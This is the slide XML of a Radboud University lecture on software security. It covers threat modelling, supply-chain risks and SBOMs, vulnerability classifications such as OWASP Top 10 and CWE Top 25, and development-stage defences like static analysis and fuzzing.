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63"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId64"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="708" r:id="rId3"/>
    <p:sldId id="666" r:id="rId4"/>
    <p:sldId id="779" r:id="rId5"/>
    <p:sldId id="679" r:id="rId6"/>
    <p:sldId id="665" r:id="rId7"/>
    <p:sldId id="560" r:id="rId8"/>
    <p:sldId id="555" r:id="rId9"/>
    <p:sldId id="574" r:id="rId10"/>
    <p:sldId id="657" r:id="rId11"/>
    <p:sldId id="654" r:id="rId12"/>
    <p:sldId id="655" r:id="rId13"/>
    <p:sldId id="775" r:id="rId14"/>
    <p:sldId id="780" r:id="rId15"/>
    <p:sldId id="256" r:id="rId16"/>
    <p:sldId id="659" r:id="rId17"/>
    <p:sldId id="667" r:id="rId18"/>
    <p:sldId id="673" r:id="rId19"/>
    <p:sldId id="672" r:id="rId20"/>
    <p:sldId id="796" r:id="rId21"/>
    <p:sldId id="797" r:id="rId22"/>
    <p:sldId id="732" r:id="rId23"/>
    <p:sldId id="729" r:id="rId24"/>
    <p:sldId id="726" r:id="rId25"/>
    <p:sldId id="730" r:id="rId26"/>
    <p:sldId id="727" r:id="rId27"/>
    <p:sldId id="731" r:id="rId28"/>
    <p:sldId id="728" r:id="rId29"/>
    <p:sldId id="674" r:id="rId30"/>
    <p:sldId id="677" r:id="rId31"/>
    <p:sldId id="678" r:id="rId32"/>
    <p:sldId id="661" r:id="rId33"/>
    <p:sldId id="664" r:id="rId34"/>
    <p:sldId id="790" r:id="rId35"/>
    <p:sldId id="791" r:id="rId36"/>
    <p:sldId id="781" r:id="rId37"/>
    <p:sldId id="785" r:id="rId38"/>
    <p:sldId id="786" r:id="rId39"/>
    <p:sldId id="736" r:id="rId40"/>
    <p:sldId id="795" r:id="rId41"/>
    <p:sldId id="739" r:id="rId42"/>
    <p:sldId id="740" r:id="rId43"/>
    <p:sldId id="741" r:id="rId44"/>
    <p:sldId id="782" r:id="rId45"/>
    <p:sldId id="498" r:id="rId46"/>
    <p:sldId id="789" r:id="rId47"/>
    <p:sldId id="792" r:id="rId48"/>
    <p:sldId id="793" r:id="rId49"/>
    <p:sldId id="794" r:id="rId50"/>
    <p:sldId id="683" r:id="rId51"/>
    <p:sldId id="681" r:id="rId52"/>
    <p:sldId id="692" r:id="rId53"/>
    <p:sldId id="693" r:id="rId54"/>
    <p:sldId id="774" r:id="rId55"/>
    <p:sldId id="685" r:id="rId56"/>
    <p:sldId id="695" r:id="rId57"/>
    <p:sldId id="696" r:id="rId58"/>
    <p:sldId id="471" r:id="rId59"/>
    <p:sldId id="733" r:id="rId60"/>
    <p:sldId id="734" r:id="rId61"/>
    <p:sldId id="702" r:id="rId62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Poll" initials="EP" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Erik P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0000"/>
    <a:srgbClr val="33CC33"/>
    <a:srgbClr val="006600"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="66FF33"/>
    <a:srgbClr val="CC66FF"/>
    <a:srgbClr val="FFFFCC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13027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10/11/2023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‹#›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365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589B20-7DB5-40F7-9A4B-BD018678CE33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574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34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019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ctr">
              <a:defRPr sz="1814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80" y="1977327"/>
            <a:ext cx="7771680" cy="1500638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="254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EB0-5426-4115-B1A1-BE4B8952066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589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81D-423D-4691-A409-FB2B6259717A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0737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E8B5-0B6A-439E-8DD8-4B62EB8DA477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785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2051-0689-466F-801D-3169EFE505AB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629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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18611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218E-0481-4205-9DD0-7FB663384F66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888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4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2583360" y="6247376"/>
            <a:ext cx="38030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BF67-ACF3-4BC0-8580-DE31188868C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816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8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147801"/>
            <a:ext cx="8225280" cy="49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23680" y="6247376"/>
            <a:ext cx="38030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E233DDCF-2EC9-403A-8D1D-24A69B0A0E28}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0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92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/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1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280994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695720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110446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525172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11045" indent="-311045" algn="l" defTabSz="446407" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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77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673930" indent="-259204" algn="l" defTabSz="446407" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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036815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451541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1866268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280994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194217"/>
            <a:ext cx="7772400" cy="1847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/>
              <a:t>Software Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0"/>
              <a:t>Threat Modelling &amp;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="6600" baseline="-25000" dirty="0">
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0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200" dirty="0"/>
              <a:t>problems</a:t>
            </a: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4120695"/>
            <a:ext cx="6400800" cy="1156105"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="8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800" dirty="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 err="1"/>
              <a:t>Radboud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2000" dirty="0"/>
              <a:t> University Nijmegen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="9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36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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/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815FA33-3B3D-0095-2061-7FAF8B7E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18" y="2600644"/>
            <a:ext cx="4602363" cy="1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4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dirty="0"/>
              <a:t>Other attack vectors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3923928" y="1988840"/>
            <a:ext cx="432048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Less obvious attack vectors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2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Supply chain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Insider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Setting a fake copy of the website at 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https://c0mpany.nl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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to use in phishing attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427032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Example supply chain attacks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https://www.wired.com/story/magecart-amazon-cloud-hacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/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54067"/>
            <a:ext cx="6045200" cy="958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32455" r="-127" b="-2360"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="506039" y="3240131"/>
            <a:ext cx="5720602" cy="7170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2368" t="2740" r="-2368" b="-2740"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3707904" y="3861048"/>
            <a:ext cx="4248477" cy="1257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D73A5-0CD3-7D54-31B3-7CF4F14FF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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="415560" y="927745"/>
            <a:ext cx="5868144" cy="13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SBOM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Software Bill of Materials (SBOM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inventory of software components of some product</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>“a complete, formally structured list of components, libraries, and modules that are required to build (i.e. compile and link) a given piece of software and the supply chain relationships between them. These components can be open source or proprietary, free or paid, and widely available or restricted access”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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Goal: improved insight in supply chain &amp; dependencies,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 be aware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of attack surface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>that the supply chain brings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 manage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>patching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Industry &amp; government push to make SBOMs standard / mandatory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624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5768-D4C3-2843-E273-27D645B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modelling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E655-15BE-9019-2036-0BF79761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HOW?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>     Attack surface, attack vectors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WHO?     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Capabilities &amp; resources of the attacker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WHY?      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is attacker interested in?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             Or: what are we as defenders worried about?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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Some semi-structured approaches: attack trees, Microsoft STRIDE, drawing some diagrams &amp; brainstorming a bit, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571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We can use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800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  security model in terms of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,                                                                     </a:t>
            </a:r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or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800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one in terms of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security requirements   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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or better still, in  terms of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security controls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>that we can implement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="5715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Threat modelling also comes up in Security in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Organisations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> course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73436-B5C6-5821-3ECB-A64E62F266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7104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1214438"/>
            <a:ext cx="7772400" cy="207054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altLang="nl-NL" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
              <a:t>HOW  things go wrong:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
              <a:t>classes of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
              <a:t>security vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="20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5200"/>
            <a:ext cx="6400800" cy="27781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>
              <a:solidFill>
                <a:srgbClr val="00990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70575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Classifications &amp; rankings of security flaws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062664" cy="49601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Many proposals to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>categorise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> common security vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bug classes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SANS CWE Top 25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>24 Deadly Sins of Software Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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3006" r="2301"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3949996"/>
            <a:ext cx="2478823" cy="144560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939461"/>
            <a:ext cx="2686730" cy="14105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b="9287"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6793899" y="3789040"/>
            <a:ext cx="1080120" cy="12167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28741" t="1" r="28535" b="-614"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7291601" y="4293471"/>
            <a:ext cx="1164836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OWASP Top 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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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60739" t="-341" r="1300" b="9506"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="713248" y="2245298"/>
            <a:ext cx="4866864" cy="32100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971" t="-684" r="57932" b="9846"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4283968" y="1115830"/>
            <a:ext cx="4419645" cy="26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OWASP Top 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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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b="7229"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="1484784"/>
            <a:ext cx="84478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dirty="0"/>
              <a:t>SANS CWE Top 25     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>[2021]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4E722-E123-3868-FF92-A7DB8C525B41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1366296" y="6140043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See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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https://cwe.mitre.org/top25/index.html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latest version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393762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CWE Top 1357   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>[Nov 2023]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See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://cwe.mitre.org/data/definitions/1000.html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>for the full list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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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8103" r="50" b="8362"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="751799" y="1106092"/>
            <a:ext cx="2167793" cy="41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0427" r="50" b="6233"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4959307" y="1124106"/>
            <a:ext cx="2167793" cy="41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4212" r="50" b="3081"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2780106" y="1150468"/>
            <a:ext cx="2167793" cy="41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7450" r="50" b="-240"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6976207" y="1160748"/>
            <a:ext cx="2167793" cy="41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Security measures at various stages in the development lifecycle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Static analysis (SAST): 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rgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PREfast</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933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Dynamic analysis (DAST) :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rgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzzing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Safe(r) programming languages                                                                    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Compartmentalisation/Sandboxing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB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>
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>detection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rgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and/or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mitigating impact </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of bugs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6614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7CC1-4F4D-4757-697B-ABABF7F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 dirty="0" err="1"/>
              <a:t>hier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9109-F978-BE84-0487-CAC5A2D1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2A092-4C84-25EE-7C22-D7C7B410E4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19805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CVE, CWE, CRE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CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>                                                                       https://cve.mitre.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CWE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> -  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Weakness </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>                                                                       https://cwe.mitre.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Here  weakness means ‘bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>class’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>                                                                     NB this is very non-standard use of the term!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1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CRE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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requirement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Beta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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>https://www.opencre.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Recent initiative to standardise/relate requirements across (the many!) different security standards &amp; guidelines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21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50" y="1196752"/>
            <a:ext cx="1058759" cy="2880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95" y="2276872"/>
            <a:ext cx="1056699" cy="3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Memory corruption? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1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5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Memory corruption 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78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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection attacks?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US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68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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF99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C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i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/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/>
              <a:t>C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/>
              <a:t>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106614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chemeClr val="tx1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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Improper Restriction of XML External Entity Reference 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v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r-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/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/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/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0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7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access control?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(authentication + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US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7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7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access control? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(authentication + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400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Cross-Site Request Forgery (CSRF)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7030A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Improper Restriction of XML External Entity Reference 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Server-Site Request Forgery (SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>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43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8086672" cy="989361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memory corruption, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access control / authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US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1196752"/>
            <a:ext cx="4030290" cy="5112568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C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-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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t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 R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q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
